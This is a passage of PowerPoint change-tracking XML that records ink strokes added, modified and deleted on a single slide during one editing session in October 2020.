          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="99" creationId="{B1860686-A0D4-43EB-A651-02ABBDDA16AD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:13.241" v="10631" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="100" creationId="{492A6001-9C7E-4215-909B-23D423F60AA9}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:13.065" v="10630" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="101" creationId="{A978553C-A4B6-45D4-B716-E8996F849126}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:12.897" v="10629" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="102" creationId="{820B2041-BA65-4279-98A5-D878DAF5177D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:12.720" v="10628" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="103" creationId="{10AF7E22-1444-4991-A53A-4A4F4495172E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:12.561" v="10627" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="104" creationId="{BA37C268-98F6-4B24-BC6A-D865E0BCC3F4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:12.352" v="10626" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="105" creationId="{D67872D5-8A05-4AEB-A5C7-39ABF05D87BF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:12.201" v="10625" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="106" creationId="{4DC6ACC9-9711-4D56-AE5C-1DD10334E051}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:12.057" v="10624" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="107" creationId="{FA6ED85C-A48E-4C74-9EB6-A8D725A1F3FF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:11.905" v="10623" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="108" creationId="{B7810070-3B04-4EE9-9350-F45F4DF1ED96}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:11.746" v="10622" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="109" creationId="{CF670C56-CAF4-44F8-9E82-1C794F743B6C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:11.595" v="10621" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="110" creationId="{0EA50FA6-D6D5-4F58-AC34-B61F177B796C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:11.224" v="10620"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="111" creationId="{E17E4599-C695-46E8-9070-57276CEF421F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:14:10.959" v="10618"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="113" creationId="{C6F9E68E-2D0C-4017-8590-1CA36657B02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5" creationId="{D6A45718-4424-437D-BDC5-EC57B92A746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6" creationId="{8B615E30-D810-4733-87BB-B7130CD532B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8" creationId="{5FA20A1F-5544-42A7-BB6A-C78568C4BF3C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0" creationId="{5BA04287-39AB-4E3F-B533-5B060268566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1" creationId="{08947D92-A155-4260-A941-9D68BEB821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2" creationId="{FF18D2A2-95B9-4B1C-A543-308BD20E7C2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3" creationId="{850A93D7-C4A1-4CE3-AD75-C625B628B5D0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4" creationId="{387ECCF2-1850-4860-A61E-FD02C90221A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5" creationId="{D1D55ECB-3385-44A0-9052-47B882AC778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6" creationId="{8BBF62F7-A925-4422-893E-02D9D361025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7" creationId="{1843A85C-FC68-4285-ACDE-781391081C6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8" creationId="{768E2CC0-8862-4D57-BFCA-96CECBE219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0" creationId="{C7C0F742-8823-4E76-98AA-5C43F72E2B5A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1" creationId="{A07EAB71-4A09-4989-99AC-495C4F73B48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2" creationId="{19A5F662-94D2-461C-903D-454AC0372E9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3" creationId="{7E45F292-5A38-47D5-9C0B-7030FE86B29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5" creationId="{E9247E98-1811-4C94-9F4B-4076C41E5001}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:15:09.732" v="10659" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="137" creationId="{098FFBB2-98CF-474C-9FC4-68F6AB5A6466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8" creationId="{85C1AF78-4EF7-495E-AD25-EE1751BD1E7D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9" creationId="{77A7D4B9-9A8D-44A6-BE03-4128F779AA83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1" creationId="{3B6E8D9A-6B33-4E08-A5F3-038DF79D47F0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2" creationId="{5863EC19-A147-4181-917B-6A9018FD93A5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4" creationId="{C5D2D663-C446-4534-AC31-986A701A0E02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5" creationId="{02846267-FF5D-49B5-B85B-F791AA83414C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6" creationId="{BD4BDEBA-B77B-4DDD-8045-CAC549FD64FD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7" creationId="{AA6B2AE9-3BB4-43E1-A65C-B2CF49ECFD36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8" creationId="{B50CC7D1-3808-4FA5-9C88-5B2885B47334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9" creationId="{5565646D-8519-436B-8E1A-3E7348299FA9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50" creationId="{22E4F472-0CE7-45B3-8DF2-BC192004A509}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del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52" creationId="{55EBACF5-70FC-4354-8E2A-A7AF76BFE17C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:16:26.225" v="10680" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="154" creationId="{228A2CC5-4A97-49F5-BA0C-A17DB1D7F056}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add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5" creationId="{AB6370B2-9512-4CCF-8CA0-BFC0188385D6}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del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6" creationId="{FDB5BB94-CE10-4575-B0E2-08EF9E1DEDBB}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:16:33.719" v="10686" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="158" creationId="{CED0456B-230C-4420-B6E8-922F780AD7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59" creationId="{4D8CA023-EAEA-4CE1-B656-AC850E8225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0" creationId="{E2B968EF-8882-4236-868D-E0879114E6EA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1" creationId="{AA281726-2EC8-4A49-B088-DB29B0E1980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3" creationId="{6E841AF4-679B-4BC9-A3F7-3B2919E3759E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4" creationId="{3CAF0C32-9D17-4DC5-A34F-F8747754AC33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5" creationId="{896A33D5-0C15-4AF3-9153-D9B1FDD29E9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6" creationId="{17B58243-6AC6-40B4-8740-424808DAC68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7" creationId="{95FCB5A5-7713-4BEB-B908-24879247BD34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8" creationId="{9E3BCD4A-F1D3-46D9-BAA5-C11EC5ADF9DB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9" creationId="{03F8078D-B0A7-4F65-A316-C8F9F5FBE0A5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0" creationId="{43319B62-1BC1-4B83-8FC6-DCA55C45AC51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1" creationId="{B80EC775-21C7-4A4F-8085-931A57E7288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2" creationId="{092AB958-F683-4694-AC98-680AB134521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3" creationId="{95B4A1E6-FBF0-42D2-B5DA-A966F5C0656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4" creationId="{9BF23A4F-1361-497E-B2B0-02FC80E73CD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5" creationId="{DC5887FA-0F67-411D-AF40-866A13CEA2E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6" creationId="{A234A197-293B-4CB8-A81D-BDA749D0A15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7" creationId="{0DA9C0A7-6637-4C29-ABC1-F0DB6F7B28F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9" creationId="{D4F58904-E917-44B5-BDB5-99F3321D7E0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0" creationId="{4D2CAA58-38D7-4876-8092-47425588B83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1" creationId="{6BF0F08B-4213-4AD7-82DE-DDF5DAAE8BD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3" creationId="{34B83D32-3EDA-4E59-9FFB-764F4A6078E3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185" creationId="{E401CF7D-3064-4876-AC41-C4B98D995B6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6" creationId="{FB3A8AF4-D1BC-45BE-8280-58753D90F50F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7" creationId="{2E147503-0920-42B2-8122-D3A7E92FB981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8" creationId="{06EDB22D-97B1-475E-9BDA-96E0AAD9002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9" creationId="{4B9D30B2-284C-4957-8A6F-0848CBE553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0" creationId="{4FC95E25-7662-4CC3-963C-7C609C5D46D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1" creationId="{828D2478-96D4-483A-8203-4F1F8E90CB9C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2" creationId="{B15FE043-7C1E-4805-B3B2-4B6D7D0E5EB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3" creationId="{B0AED03D-E5E1-45AC-AAB2-5C963FDF521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4" creationId="{355CF75D-4C33-49F3-A694-17DF23381D56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5" creationId="{58D169A3-78C2-4B99-A8B9-177EBB55004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6" creationId="{289EC716-2C96-4F08-AA2F-DABE78C0C160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7" creationId="{B6291A9D-0A07-42D4-A29E-49AB7A93F4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8" creationId="{783F26C5-47A6-4A1B-8E73-CF3DB02F1D0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1" creationId="{D491E393-26C3-47CB-A643-89D163CE592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2" creationId="{129EC4CB-931C-4DDB-8A40-3BC9B4F0EA28}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:53.914" v="10773" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="203" creationId="{EB204AE5-17A8-4FE6-9922-117F609F420D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:53.501" v="10772" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="204" creationId="{DC431D98-DB56-43FC-BF9E-957CBE322F98}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:53.094" v="10771" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="205" creationId="{C27B6889-CFE0-4DF2-8960-9D6345041A19}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:52.933" v="10770" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="206" creationId="{541F7E6D-4B14-426F-9213-D9B1D080A82C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:52.765" v="10769" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="207" creationId="{9E2AED6B-30D1-4B00-9602-FE6BD84D16C1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:52.566" v="10768" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="208" creationId="{BD222C54-8BBD-4518-A428-DDAABB4378D9}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:52.265" v="10767" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="209" creationId="{20EA040E-C388-4BE3-B806-478B18E407C1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:52.107" v="10766" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="210" creationId="{50B3F887-3117-47A5-B08C-9B6F3F95110B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:52.002" v="10765" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="211" creationId="{ED7D9B8D-BCD7-4A5D-8AC6-4B17EE6A0824}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:51.860" v="10764" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="212" creationId="{DD3EF392-70AF-4CE3-BA42-6D5A417F5F06}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:51.704" v="10763" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="213" creationId="{952255D6-A14B-463C-B219-A97CD0BE7032}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:51.572" v="10762" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="214" creationId="{74779549-0839-414A-A188-F01A8AE9BF2B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:51.410" v="10761" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="215" creationId="{085A0029-A6B1-4F98-9FE5-D85171E8ABD7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:51.218" v="10760"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="216" creationId="{397A5478-F950-4427-8A20-1AE314DC807D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:50.947" v="10758" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="218" creationId="{90DCF71B-DC67-4353-A37E-0394CB38BA99}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:48.414" v="10757" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="219" creationId="{D61ECD08-9410-4FF3-A71A-6E193D2E3780}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:47.999" v="10756" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="220" creationId="{856D2E4B-662F-4684-8154-EC543399DF52}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:47.789" v="10755" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="221" creationId="{7E0E3BD0-0064-463D-913A-221D8E929EED}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:47.458" v="10754" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="222" creationId="{62244C62-994D-4E4D-8EF4-0FFB5DAD7FC0}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:18:47.034" v="10753"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="223" creationId="{22D620A2-A3A5-4724-BEEA-755A11B26F93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5" creationId="{0D8378CA-9749-40D4-847F-8FEC14BA368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6" creationId="{888749DA-1E62-40A3-9203-77C17B5F1CAF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7" creationId="{3945C384-41E2-458E-B9A2-1659464758D5}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:19:01.429" v="10780"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="228" creationId="{09D2B47A-843A-49A0-9ED0-76B7206D80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0" creationId="{BDFBEDBF-9EF7-4722-823F-1FDAAA96051D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1" creationId="{C5FC5A70-1F7B-4A12-B789-80CA17E8A3B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2" creationId="{E51F0181-2E21-49C8-86F1-9318C1121C55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3" creationId="{BD14B980-01BC-451D-9873-40E6A666885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4" creationId="{CF1F1FE5-FDB5-448C-90AF-1556B942571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6" creationId="{A4CADF44-D8A6-40F3-98FB-94BD22856734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7" creationId="{BBA392E6-9037-4828-B6EC-6A58FBCE6A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9" creationId="{F3D2621A-11A1-4404-A508-26024A85A66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0" creationId="{4CC7E0D5-AAC6-4B8F-B99B-7B651C7A8E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1" creationId="{5F9F4C06-EE5E-4E23-9A73-1836FE538F61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2" creationId="{2CC147F2-828E-4B8C-92A1-9F42BB81C2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3" creationId="{9F8FBED4-F001-4CEF-93E6-37E637CC3F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4" creationId="{930CF89D-A9C4-4CF1-A5DC-2837D36C5A04}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:19:18.692" v="10800"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="246" creationId="{3260E469-383C-4662-90C8-F28CAA8BE7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8" creationId="{EA140E98-3B81-4929-AF80-236B27ABF2A0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0" creationId="{172B0216-EF88-47E9-A542-1CC9F761B43B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1" creationId="{BA6FF125-F655-46E3-8825-0411CB80680F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2" creationId="{5489DA5A-D632-49A5-9965-81AD970C43D4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3" creationId="{4BB11F4F-E9DF-4638-9ED2-D4E8E4DA94BE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4" creationId="{24E43B45-BF31-45E0-9B23-47A3D02F0B7E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:19:33.554" v="10811"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="255" creationId="{040769AA-F9BE-4AEA-805F-E85835684531}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:19:38.831" v="10815"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
            <ac:inkMk id="257" creationId="{757A8562-10CD-40FA-B98A-DDB3EEAB610C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9" creationId="{6AFC395A-6D75-4D78-9A0E-6DC3A67FA06A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1" creationId="{4C96919A-5BD0-4F8E-96F1-CDA1AEE5F0A9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2" creationId="{CE960894-08BB-457F-8D52-D503E80969F5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3" creationId="{E07F7F0B-C199-4DF2-99BA-DA4C71396DA2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4" creationId="{CDE4A154-9B26-4BBA-AF65-C18B385F95F8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5" creationId="{C542934A-8967-4551-ADB7-B55433F513D3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6" creationId="{81DAE7D4-4629-4D72-803F-20DC474D7DA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8" creationId="{A6713724-A43D-4AC8-9B4E-C3C2662F955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9" creationId="{EB21332A-9D89-4674-9E19-7051ED180FE2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0" creationId="{1DD7312D-6DE2-4419-AA75-053E647CFFF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2" creationId="{C092077A-E70D-4705-8293-C0EF65E4583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3" creationId="{104780FB-D2DF-437D-8D97-1E6C0CDE186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5" creationId="{1C51E78D-01C5-422D-B0C1-4262FC93DE4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6" creationId="{A74756D5-4D09-4286-856B-CC4CCCCF47A6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7" creationId="{462FC35F-213E-4404-932E-860B74E1FD6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8" creationId="{6F3A3AAF-F315-448B-9802-24240ECE028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9" creationId="{ED40C909-4185-4E94-B14B-F2AC03196F3A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0" creationId="{58061080-6E55-4AFA-BD25-4929DDACB77D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1" creationId="{F0574E17-161D-469A-83AF-8B1EA0087BE1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3" creationId="{BBF08CF6-FF1A-49AF-A0B7-243F01D9487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4" creationId="{53506BE7-1748-477E-A283-72C28974AA3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5" creationId="{D63E43D0-51E5-444B-8393-D91965D0422C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T10:20:40.650" v="10879"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190681715" sldId="305"/>
